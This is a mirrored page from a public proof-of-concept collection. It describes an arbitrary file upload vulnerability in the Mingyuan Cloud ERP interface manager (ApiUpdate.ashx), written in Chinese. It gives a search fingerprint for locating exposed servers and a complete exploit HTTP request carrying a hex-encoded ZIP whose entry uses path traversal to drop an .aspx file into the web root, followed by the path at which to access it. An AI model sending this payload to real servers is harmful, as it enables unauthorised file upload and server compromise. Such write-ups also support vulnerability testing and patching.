admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 11:58:05 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/明源云 ERP系统 接口管家 ApiUpdate.ashx 任意文件上传漏洞.md
Threekiii 11de4c1d47 update
2024-11-06 14:10:36 +08:00

47 lines
1.6 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 明源云 ERP系统 接口管家 ApiUpdate.ashx 任意文件上传漏洞
## 漏洞描述
明源云 ERP系统接口管家 ApiUpdate.ashx 文件存在任意文件上传漏洞攻击者通过构造特殊的ZIP压缩包可以上传任意文件控制服务器
## 漏洞影响
明源云 ERP系统接口管家
## 网络测绘
```
"接口管家站点正常!"
```
## 漏洞复现
登录页面
![image-20230828112408580](images/image-20230828112408580.png)
漏洞存在于某端口下的接口管家服务
![image-20230828112456562](images/image-20230828112456562.png)
验证POC
```
POST /myunke/ApiUpdateTool/ApiUpdate.ashx?apiocode=a HTTP/1.1
Host:
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3)AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 856
{{hexdec(504B030414000000080063740E576AE37B2383000000940000001D0000002E2E2F2E2E2F2E2E2F666463636C6F75642F5F2F746573742E6173707825CC490AC2401404D0BDA7685A02C9A62F90288A22041C42E2B0FE4A11033DD983E0EDFDE2AEA8575453AC444723C49EEC98392CE4662E45B16C185AE35D48E24806D1D3836DF8C404A3DAD37F227A066723D42D4C09A53C23A66BD65656F56ED2505B68703F20BC11D4817C47E959F678651EAA4BD06A7D8F4EE7841F5455CDB7B32F504B0102140314000000080063740E576AE37B2383000000940000001D00000000000000000000008001000000002E2E2F2E2E2F2E2E2F666463636C6F75642F5F2F746573742E61737078504B050600000000010001004B000000BE0000000000)}}
```
![image-20230828112528906](images/image-20230828112528906.png)
访问地址:
```
/fdccloud/_/test.aspx
```
Reference in New Issue View Git Blame Copy Permalink